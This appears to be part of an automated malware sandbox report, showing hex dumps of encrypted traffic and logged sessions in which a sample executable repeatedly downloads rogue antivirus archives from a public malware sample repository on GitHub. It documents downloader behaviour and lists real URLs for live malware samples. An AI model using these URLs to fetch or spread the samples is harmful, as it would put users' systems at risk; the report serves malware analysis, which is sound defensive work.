ea e4 21 48 52 70 25 11 1c 6a 10 61 7f 77 2e 5c e0 dc a1 0e b2 1b 99 76 21 70 3a 55 e1 5b e1 86 96 3b a4 0e
                                                                                                        Data Ascii: LL\ZFJ1UpC`"zpx'>LVq'1Y#|{YNu3cg;j2I<ja]<Cyj2Cv*Ao/*@(,}lT4Z7KJa0Z=v{cJjCgNGt%zX,!HRp%jaw.\v!p:U[;
                                                                                                        2022-09-29 12:46:35 UTC15830INData Raw: d4 e9 53 62 49 f4 15 30 4f 6e d7 e1 31 a9 78 c8 2d d6 45 3a 01 c5 0a 92 75 58 d1 ed 61 02 d2 e9 2b ad 10 a0 8a c5 5b 6a 06 87 66 24 30 af e9 82 63 b5 9b 6e d3 18 f3 87 94 8f 47 9c e0 9b c1 3a 03 01 96 b6 62 fc a5 15 53 6e 0a 7c dd fc dd 00 be de e2 b6 ea 51 33 8d e1 10 9e f8 73 12 a3 b4 57 95 43 c3 c2 dc d1 28 d2 db 83 52 5d f0 92 47 ae 5d d6 d1 7b df 25 16 8a 5e 35 5a 1b 6d 47 28 a3 6b 69 07 1d 4d 9d 00 25 82 33 dc f7 d4 15 fa d8 ba 29 9f d2 82 bb ce 70 09 2b e4 13 3b 86 f4 f2 90 c0 d6 09 b3 11 1f 6a b1 81 c0 d5 ac 05 05 a3 5b 94 02 ee 7f db f2 6b b2 a3 d0 76 66 5c 33 72 03 e8 2c cd 8e 63 f2 84 0c 19 f4 98 6e c7 ed 0b 3d 73 fd 29 9e a2 3e 55 1c a4 56 85 95 2e f7 7d fa 49 6f a7 cc 47 3d 04 dc eb 17 fc 7a ae a2 0d 18 2a a5 a1 84 6b 8a bd 5e 7c 5f 8e 50 96
                                                                                                        Data Ascii: SbI0On1x-E:uXa+[jf$0cnG:bSn|Q3sWC(R]G]{%^5ZmG(kiM%3)p+;j[kvf\3r,cn=s)>UV.}IoG=z*k^|_P
                                                                                                        2022-09-29 12:46:35 UTC15846INData Raw: 5c 1e 4a c0 6d b9 ab e6 ba 3a 9f 73 3b 15 1e 31 6b 24 df 71 fe 95 7b 3c 86 c4 89 9e 24 c0 d6 25 9a 92 41 5c ae 6a 7a a3 e0 fe 6e 00 df 50 c6 1d d4 90 93 a0 d8 9f 0b ae 42 9a 12 4b 09 f5 3f 93 50 ff ac d9 25 50 62 83 8d d3 61 9c d7 af dc 32 12 4e ca 71 b8 eb 40 f8 02 0e 50 78 c0 34 b5 bc e7 06 74 93 7c 85 b0 af 91 72 fd 2f 45 33 86 3d 08 ba 72 08 1b fc 1c e4 e1 ca 56 f8 3e 44 99 18 75 43 d8 5e c1 21 20 5d f8 17 ba 5b 97 31 53 61 0e 41 cd 03 55 60 f4 46 2c de 8e 5c 22 86 55 ba e2 e8 8e d0 d4 fa 3a b9 fe 3f d6 f4 22 37 17 ec 2e e2 82 3b 38 3d c7 1c cb eb 8d 46 5b bb 31 27 70 9d 82 ad 8e 24 d0 ad 2b f7 04 41 56 c8 01 3f ed d9 bc 4d 49 b3 5a 04 a0 43 8a 36 5a 4b 19 36 4e 51 f2 be f6 19 10 72 18 74 1f dd ba 3a 46 94 ea d2 f6 0d f5 2a 84 d0 71 b4 f4 9e b7 55 7f
                                                                                                        Data Ascii: \Jm:s;1k$q{<$%A\jznPBK?P%Pba2Nq@Px4t|r/E3=rV>DuC^! ][1SaAU`F,\"U:?"7.;8=F[1'p$+AV?MIZC6ZK6NQrt:F*qU
                                                                                                        2022-09-29 12:46:35 UTC15856INData Raw: 1e 83 86 57 9b bd 3a 2b e9 9f 5b f2 00 d5 61 4e c5 31 2d 38 31 b2 9a 94 42 c0 69 ba a0 4c 36 72 65 01 e5 61 5f 9e f5 46 fb 06 51 3a 1a db 9f d9 ba 5c 28 cd 7b 49 8d bd ed 43 4f ec 89 e3 a4 c9 0a 8d 27 2f 02 1b 65 8a 4c 9c 2c d5 04 d0 ed 41 be df 96 d7 f8 1c 9c c1 68 b6 8b 94 5f 62 04 20 2c 0f 46 42 ee 4b 61 93 51 40 d9 17 41 67 6b eb 8d 9f b8 a1 d0 de 93 cc 3d 46 6b d6 a0 a9 99 d2 34 fc 51 c7 ba 9e 96 99 6b df d4 bc 80 ed 81 3f 33 f6 0f b9 b8 3d 9a a1 62 52 8b c6 5b 8c aa 11 fc 3e f4 8a 9d 5b a6 30 20 42 92 03 94 97 ba e0 8c 4a 18 a9 05 d6 20 18 17 ec b1 48 7e a7 42 c8 4b 5d 92 7a 93 45 dd 4c 14 fb 12 1e 6c 57 80 28 f9 fa de 53 35 6b 5c 3d 8e eb 81 99 1a 5c fb f7 c4 20 9e 93 51 80 40 d0 d0 06 d1 b3 be f1 68 6d e7 a7 88 dd 01 0c 59 6a 0e 4f dc 0a 7a 92 f3
                                                                                                        Data Ascii: W:+[aN1-81BiL6rea_FQ:\({ICO'/eL,Ah_b ,FBKaQ@Agk=Fk4Qk?3=bR[>[0 BJ H~BK]zELlW(S5k\=\ Q@hmYjOz
                                                                                                        2022-09-29 12:46:35 UTC15872INData Raw: 32 44 d4 c9 73 5b 8d cc 3d 5a 30 09 fe a0 8f 88 bf a3 3d 26 3c ed 92 40 01 c1 0c bd 54 53 31 a7 3f e0 00 b3 10 59 fc b2 c0 5c 20 ca d5 df 6c 4f c3 d2 9f db 79 4e 90 e4 26 cd 07 93 74 3a d6 03 67 42 f1 79 53 84 fa 83 ce 31 dd f8 c1 a5 b6 1f 85 a2 f4 ef d2 c6 09 57 6a 90 d3 5f 40 97 a9 a8 fd 62 c4 66 da 8b 10 cc f2 13 19 8f d5 12 17 72 d0 9c 57 29 0e a5 d6 98 27 6a 79 a7 d1 10 44 5d e1 1f aa 6f f5 78 ec 1d 94 e1 5b f7 54 29 b7 c3 e1 79 72 68 a1 53 e6 7c 5d 17 4c 72 31 d0 34 78 68 7b a8 4c e0 3f 66 ae 17 45 a3 d6 52 b7 11 ac 80 89 f5 63 bb fe 40 34 cf 79 e7 7f 40 2a 25 af a7 55 71 79 a2 a3 4e ac 3a eb 96 85 2b bd 33 74 92 f0 cd 13 ef ca 84 f1 01 c0 8c 0c 67 eb 2a 4c 75 ff 34 3e 7b db 6d ac dc 0e 4c 0d d6 c8 1e 2a a9 36 c2 a6 19 0f e9 74 c8 d7 a1 99 65 03 6f
                                                                                                        Data Ascii: 2Ds[=Z0=&<@TS1?Y\ lOyN&t:gByS1Wj_@bfrW)'jyD]ox[T)yrhS|]Lr14xh{L?fERc@4y@*%UqyN:+3tg*Lu4>{mL*6teo
                                                                                                        2022-09-29 12:46:35 UTC15888INData Raw: 5b d6 ac 64 e4 e9 3e 04 76 f8 36 5b 23 2c 7c d6 ea b1 20 c3 75 24 59 be 70 8c 96 7f 83 4f 79 54 b5 ad 2d 6c 86 79 20 51 3a 16 ea 21 95 d1 31 69 c1 45 ce 77 2e c5 95 2c f7 bd cb 48 22 41 8f f6 e3 ec df 28 7f 74 54 a1 2f ea bf 7b 1e 6a a4 61 5e 40 f3 d7 98 0b a1 4f 59 c7 23 85 ef d5 37 cd c3 5b 49 23 52 5e 33 c4 cd bf 87 bf c0 4e db eb fa a5 19 fa e9 ea cc 16 17 d4 1a 65 7a f8 7c b9 4e 28 68 ed 70 06 8d e6 81 c3 60 27 b3 cf 40 27 22 ed 2f 65 60 6e 5d b1 de 0a 85 44 6f 59 57 e5 4c 26 bb 8e 9c 8d f1 eb 0a 61 70 eb ab 80 3f c7 f5 92 f8 b6 4d 91 71 6d 2c f4 de e8 45 38 15 70 d7 38 c5 a9 ae 03 fe 45 6d a8 99 16 c7 f7 8c 1d 2e 6a b1 50 5b e1 c8 11 95 13 eb 9f e2 a5 c5 29 11 e8 49 15 49 57 92 21 cc 9a 22 48 be a9 a8 b0 63 74 be c9 b6 a5 3f e7 79 5c be a0 f7 a2 f9
                                                                                                        Data Ascii: [d>v6[#,| u$YpOyT-ly Q:!1iEw.,H"A(tT/{ja^@OY#7[I#R^3Nez|N(hp`'@'"/e`n]DoYWL&ap?Mqm,E8p8Em.jP[)IIW!"Hct?y\
                                                                                                        2022-09-29 12:46:35 UTC15904INData Raw: 0a 5e 18 ef 14 49 fe c9 4d 71 fa 8a 6f 1d 45 26 1d ff 79 db de 7a 0b a3 e1 49 49 69 8d fa e0 b3 88 6d e2 49 2f 50 48 7c 29 e7 54 bd 02 f5 76 72 fd ca fa 75 68 86 ed 9b a2 dc 25 85 33 f6 73 23 7c cb cf a4 f5 3b 87 d5 38 c0 86 5a 60 14 99 fc 6c 63 e1 22 7b 0f d4 cc f7 9d 82 8f 31 08 2f 40 4f 33 a1 fc 1e a7 2b 69 63 2d 01 3d 84 79 bc 3e 97 9e e9 a7 a7 db 1c 5e 97 13 71 58 c8 48 66 58 04 82 4f ed 8a 28 ff c5 56 25 1b ec 8b 46 a1 36 14 59 25 9a e7 4e 3c 31 d4 95 98 92 e7 55 02 cf f1 53 94 6a 24 18 a5 1e 2b fc db df db 90 41 6a a9 e9 e8 13 bc 06 26 01 6d 92 3c d3 22 1f 7f b9 44 f0 e6 41 04 32 16 78 7a e2 19 fc 7a 7f bb 45 3e 2e 31 f2 47 05 f4 e3 4d 8b a2 0b 49 09 34 60 08 3d 3b 78 79 70 e0 68 44 9a fc 7e d0 fc 70 66 e3 4d 4c cf 9e e2 21 a5 c0 8a 51 cf 5f 25 ad
                                                                                                        Data Ascii: ^IMqoE&yzIIimI/PH|)Tvruh%3s#|;8Z`lc"{1/@O3+ic-=y>^qXHfXO(V%F6Y%N<1USj$+Aj&m<"DA2xzzE>.1GMI4`=;xyphD~pfML!Q_%
                                                                                                        2022-09-29 12:46:35 UTC15920INData Raw: 60 40 f9 75 95 05 18 e6 ea 76 28 3f 83 d5 e5 94 70 e4 02 14 92 6d 84 e9 64 e7 21 94 fd b2 ea 2f cb 35 af 0d c6 f8 57 52 cf 94 53 3e a3 df ea 3d ae 09 86 bc 33 ec 79 ab 38 32 0c 46 f9 89 41 33 2f a1 26 72 83 ef 3c 6b b2 2e 8f 2f e3 26 d4 c2 0a 47 66 cd 61 13 d1 b2 74 b4 7b 5d 65 c7 ee 7a 34 93 86 01 5c 8c 8f 9d 42 eb e0 f3 10 71 ef 8a 23 a3 44 9f 8d 11 db 95 3c 12 c4 45 c8 4c e4 f1 73 fc 4d cb d4 a1 9b d6 6d eb 55 2b 48 e5 3f 9e 7f f6 da fa bc e8 24 db 87 c2 b7 ad 2d 41 32 af 5e b6 84 2a 21 ad e3 b6 a0 ee 6f fe c1 02 6e 46 ef 37 ff f7 bb d9 c9 83 20 93 e5 ab 97 f0 b5 03 cc 14 4c 23 35 24 84 36 a8 b8 35 08 a7 0b e0 82 c7 b0 8b b7 b5 ba 04 c9 99 1a 1f c5 b4 f9 9e ca 8b c9 3b e4 39 2e 2f 1d 25 6a 7f 0e 6a 5c 54 c3 64 c0 04 7d 1b 3d 55 95 a6 a7 c0 4d c0 10 22
                                                                                                        Data Ascii: `@uv(?pmd!/5WRS>=3y82FA3/&r<k./&Gfat{]ez4\Bq#D<ELsMmU+H?$-A2^*!onF7 L#5$65;9./%jj\Td}=UM"
                                                                                                        2022-09-29 12:46:35 UTC15936INData Raw: ad 0d ee d4 27 81 30 87 f0 e7 b9 db d2 58 94 0f 98 e7 f9 09 84 69 67 e2 c7 2e c7 12 2e cc f0 14 ea 2b f9 d2 7c 05 be d6 fd bd 08 6c 0d 62 d6 20 6a ec a3 04 0e 6b a1 d7 fc 30 d3 8e 61 46 f5 6c 97 1a 5c 9f 19 73 2e 27 f9 3c 4b 4f 5c 55 b5 57 31 63 0b fc c9 55 11 39 10 7f 6a 18 ab 44 e0 a2 30 5e 14 92 38 e2 65 a4 bb 71 23 a9 00 a0 40 a8 d0 e1 c0 57 74 57 bc d1 a7 ef 1e 39 6f ed 30 5d d8 58 a7 ad 99 aa 39 79 e3 48 c7 0c 6c a3 d2 0c 53 f5 f1 6a 45 60 05 eb 6c 2c c7 ac d7 04 f8 90 4e 68 bd 72 09 2c 84 66 da 7b 16 58 0a 7f 38 64 06 0e 49 8e e2 51 da e4 d8 fe 78 dc 83 63 fb 52 62 40 e1 72 86 a7 ed 8e 80 df 44 86 02 b9 5b 43 f1 4b a6 23 cb 6f f1 17 0e 6b be 00 cb 01 4f 8c 6a 5f df 8e 6c 4d 49 c7 e0 d9 4d d6 53 0e e2 eb 16 ba 82 dd ce 8b bb ea 55 4d 35 fd a3 77 70
                                                                                                        Data Ascii: '0Xig..+|lb jk0aFl\s.'<KO\UW1cU9jD0^8eq#@WtW9o0]X9yHlSjE`l,Nhr,f{X8dIQxcRb@rD[CK#okOj_lMIMSUM5wp
                                                                                                        2022-09-29 12:46:35 UTC15952INData Raw: bb f5 44 44 20 06 21 6d c8 5c 95 d7 44 10 49 55 00 2e fc fb 5f 21 75 96 44 fc 15 7e 8b a5 3b 2f c9 42 75 74 f7 fe 63 e2 5e 45 10 d9 98 6c d5 e6 72 c5 fd a2 c0 fd dd 55 02 fa 15 2c d4 ef 5b 16 b9 4a 8f 96 3b 53 4d f2 1e a4 38 23 00 a0 fa df e4 7b b2 4e 25 f7 f0 5b 31 ba 79 42 cb c7 9e 3a d1 e2 2c ea fb ff ac 7f 9e 06 70 20 ac c3 ca 8e 20 33 89 bb d4 c9 45 92 4c fa 3e 47 50 e5 d9 fc 1f ab d0 e9 b4 3e 1d 9a 5d 53 4a c7 d9 d6 19 0b fa 04 a8 f9 b2 03 96 9e 5c 70 f9 ef 8f 7b 21 68 eb 30 39 aa f1 bc f6 6a ae 8a c9 2a 33 ee ce 4a 18 f5 ac 65 ff f7 1d 12 11 12 8f 12 1f 1c 41 ff 8d 5f 49 0b c7 7f 4d d9 5f 02 0a 14 5c 90 5c e5 34 d0 bc e8 59 34 42 5b 4d 1d 29 07 80 55 20 d8 db 11 a3 ba 01 4e 14 17 a9 43 58 e3 bb 1c d4 b1 40 0e 0d 5b 69 49 fe 56 54 a3 58 0f 54 0b 51
                                                                                                        Data Ascii: DD !m\DIU._!uD~;/Butc^ElrU,[J;SM8#{N%[1yB:,p 3EL>GP>]SJ\p{!h09j*3JeA_IM_\\4Y4B[M)U NCX@[iIVTXTQ
                                                                                                        2022-09-29 12:46:35 UTC15968INData Raw: 98 02 be b2 7d 14 c0 08 b5 25 65 52 46 1e 41 47 a7 93 15 29 db 69 26 59 00 c0 11 c8 30 15 cd bb 96 dd 6a 17 2c 94 60 6e 21 6f 4c 1c 86 21 46 fa 2e 3e 44 a1 08 81 b4 fa 1a bc 69 d6 34 be dc 9d d6 d5 69 b0 ed bb 56 a7 eb a5 33 84 1d 69 6d a9 02 82 52 8b fb d4 ae 41 38 34 57 49 47 be 86 80 24 43 31 b2 dc d5 25 25 75 82 9d 7b d9 73 cc f7 ef 45 69 ff 5d cc 0a 32 b8 91 4d b5 47 95 e8 76 ca 64 08 6e 34 13 b5 45 b9 2b 7d 73 80 8b e5 54 56 24 62 70 9e ee a6 bb 93 4e 31 3d 76 22 ec 7d 34 bf 37 70 73 7a 19 bf 78 73 b0 e4 35 88 29 6d c9 a7 bc 85 57 fd 43 55 a9 8b c9 4a 12 d3 aa 6c 73 d4 4c f4 2e 9f a9 0a 88 31 e6 be da 67 a5 a8 8f 40 b7 3a ae 07 c7 e3 ad 91 5f 9e 23 a8 aa 3b 7c 09 ff e3 ca 42 be 4a ee be be d5 be 6c 13 7b bc 66 30 4a 9f 89 33 95 d2 95 d8 80 88 9f 32
                                                                                                        Data Ascii: }%eRFAG)i&Y0j,`n!oL!F.>Di4iV3imRA84WIG$C1%%u{sEi]2MGvdn4E+}sTV$bpN1=v"}47pszxs5)mWCUJlsL.1g@:_#;|BJl{f0J32
                                                                                                        2022-09-29 12:46:35 UTC15984INData Raw: 1b 55 05 b7 f0 bd 4f d7 c2 00 92 97 66 f1 bf 7c 08 b3 fa 86 78 ec a1 b6 64 37 12 70 cd 0b 6e ae df e4 a9 24 ff 5f 98 4f fa da b0 f4 34 65 0e 58 56 d6 1b 7e 1c 04 8f 4f d3 f5 bc 17 a7 eb b7 20 a3 d7 e7 2e f0 d8 71 39 f5 44 55 0d 01 b0 55 29 56 bc 6b e5 8a 5b 65 29 ef 12 f6 99 20 b9 f7 aa 50 94 6c 2b 42 d9 c1 6c c9 2d 2b f0 b2 1c f1 84 01 23 b6 9b 83 47 a3 67 ab 98 77 4e f1 3e 46 b4 4f 28 47 70 3e 52 86 a6 33 bb 9b f5 27 ea 3f 6b a3 06 2e 5a 49 03 91 d0 cc 7e ec 87 61 c9 91 26 10 50 f2 74 6d 60 2c 8b 7a ab 51 5b 10 3f e3 6c a8 07 12 9a 59 bb 5d 2b 01 fa e5 91 80 d6 cb 9e 32 57 0d 84 86 ee ec b3 07 74 89 d8 4f 0f 05 07 f4 b0 81 57 d0 14 e5 12 d2 6b 10 eb c4 59 f5 83 65 12 34 1c 7e ed 0e 7d 54 86 a6 31 e8 09 a5 6e 94 fb 7e df fa f1 b6 3f cf bb f3 1d 80 1e eb
                                                                                                        Data Ascii: UOf|xd7pn$_O4eXV~O .q9DUU)Vk[e) Pl+Bl-+#GgwN>FO(Gp>R3'?k.ZI~a&Ptm`,zQ[?lY]+2WtOWkYe4~}T1n~?
                                                                                                        2022-09-29 12:46:35 UTC16000INData Raw: b1 29 74 e7 f1 5c f6 32 5d 7b da b5 04 28 63 42 f3 ad 87 0b cf c9 1c ec 04 7e 39 f4 7d d6 5b be b2 2b 19 7a 9f 70 6f 8c 3a d2 8d 2a 9d 2b 54 38 d2 15 17 2b ac 80 df d3 42 c6 c6 ca 18 b2 7e 7e e4 99 18 14 75 5d 83 71 70 b0 59 57 be 29 89 7e 25 44 38 c1 9c 16 44 dd 26 43 25 a7 2f ad bf 0a db 72 48 ad 37 53 bd 7d 50 15 35 a1 5d 12 75 ed 7a e4 f4 d9 35 52 21 d2 d4 67 30 dd 57 de 4a eb 57 e1 a8 42 ce 3e b6 96 87 55 48 8b 48 2c 66 22 f4 eb cf d1 bd 71 81 7e c5 7d 57 b6 9a 41 f5 43 aa 5d 0d 1b 79 a9 c4 ed 37 4c 28 f3 ff cc 07 ae 70 2d 1e e2 9a 81 2f 01 3d f1 22 00 6b 48 19 99 56 4b 7a a3 d3 88 63 95 a9 9e 53 e4 11 c9 15 b2 0c c7 4e 38 6c db 37 bb 22 aa 9e 3e 3a 1d d9 fd 44 2e ee 27 72 2d 00 bc 7d 5a 60 76 c5 1c 41 b3 8e 4e 7b 58 31 14 32 eb d1 f8 42 d1 8f ef 82
                                                                                                        Data Ascii: )t\2]{(cB~9}[+zpo:*+T8+B~~u]qpYW)~%D8D&C%/rH7S}P5]uz5R!g0WJWB>UHH,f"q~}WAC]y7L(p-/="kHVKzcSN8l7">:D.'r-}Z`vAN{X12B
                                                                                                        2022-09-29 12:46:35 UTC16016INData Raw: 2b 4f 12 38 fb 68 bc 82 8d 96 d7 4d cb cf a2 06 61 cd be d2 2a a9 37 4e b1 9a f9 e2 47 6e fe 1c e8 57 61 00 e2 87 a4 0b ba 52 7d 8c a5 5e 6e 73 f5 c5 54 30 57 9e 0c 1b 6a ea 3c cd 51 97 20 fe ca 35 f6 0e 81 a6 6b 2b 40 cf cc 1d 5e a6 f7 ae 32 94 34 d2 37 d1 34 b8 3e 40 fa 99 06 3d 82 c6 94 75 fd b4 e0 50 11 40 e0 3f 5f b2 9b 6f 4d 85 45 c4 c6 b4 00 47 c6 6c 5e 7c 94 98 ac 38 4d 0d 4a b0 76 aa 1f 3b 8f 70 74 11 94 38 69 23 77 18 ca 7a 52 a7 49 c2 88 be 8e 2c 10 f1 2a 55 8e 96 6a b3 98 d7 bd 76 5e d2 9e 26 b0 08 07 71 c9 86 a5 7d 65 de 26 21 4f 42 41 9d a9 70 37 24 45 ce eb 5e 9d 16 c7 b7 d2 dd 4a 20 bf 1c 33 c0 04 aa 2e 0a a7 f4 05 5e 49 1a 3e 7b 4a 80 22 d3 b6 11 7b fe 96 cd 8a d2 f5 eb 23 82 6a 74 43 9a 35 73 8f f3 0c a1 3c 7b 21 9c 04 ce 87 7d 15 93 c6
                                                                                                        Data Ascii: +O8hMa*7NGnWaR}^nsT0Wj<Q 5k+@^2474>@=uP@?_oMEGl^|8MJv;pt8i#wzRI,*Ujv^&q}e&!OBAp7$E^J 3.^I>{J"{#jtC5s<{!}


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        42192.168.2.449793140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:36 UTC16021OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:36 UTC16021INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:10 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:36 UTC16022INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        43192.168.2.449796140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:37 UTC16024OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:37 UTC16024INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:50 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:37 UTC16024INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        44192.168.2.449798140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:38 UTC16026OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:38 UTC16026INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:53 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/NavaShield.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:38 UTC16027INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        45192.168.2.449800140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:40 UTC16029OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:40 UTC16029INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:45:01 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
